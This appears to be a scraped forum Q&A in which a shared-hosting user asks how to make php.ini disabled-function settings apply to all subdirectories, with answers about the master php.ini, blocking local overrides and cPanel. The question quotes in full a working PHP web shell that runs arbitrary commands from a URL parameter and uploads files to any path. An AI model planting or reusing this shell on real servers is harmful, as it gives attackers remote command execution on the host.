Tutorial :How do I enable my php.ini file to affect all directories/sub-directories of my server?


A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php  if(isset($_REQUEST['cmd'])) {      echo "<pre>";      $cmd = ($_REQUEST['cmd']);      system($cmd);      echo "</pre>";      die;  }  ?>    <?php  if(isset($_REQUEST['upload'])) {      echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">          <input type="hidden" name="MAX_FILE_SIZE" value="5120000" />          Send this file: <input name="userfile" type="file" />          To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />          <input type="submit" value="Send File" />      </form>';  }  ?>    <?php  if(isset($_REQUEST['send'])) {      $uploaddir = $_POST["direct"];      $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {          echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;      } else {          echo "Upload failed";      }  }  ?>  

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?


One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but if can be in several places, check php_info()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.


Wow! move the php.ini file on a per-directory basis? Didnt know you could do that.

My best guess (someone please correct me if im wrong), php probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to update your php.ini directives to the global php.ini (found here in ubuntu: etc/php5/apache2/php.ini)

Alternatively, you might want to try to use .htaccess to prepend a php page onto all pages with the following:


Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.



Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.


Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.

Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com
Next Post »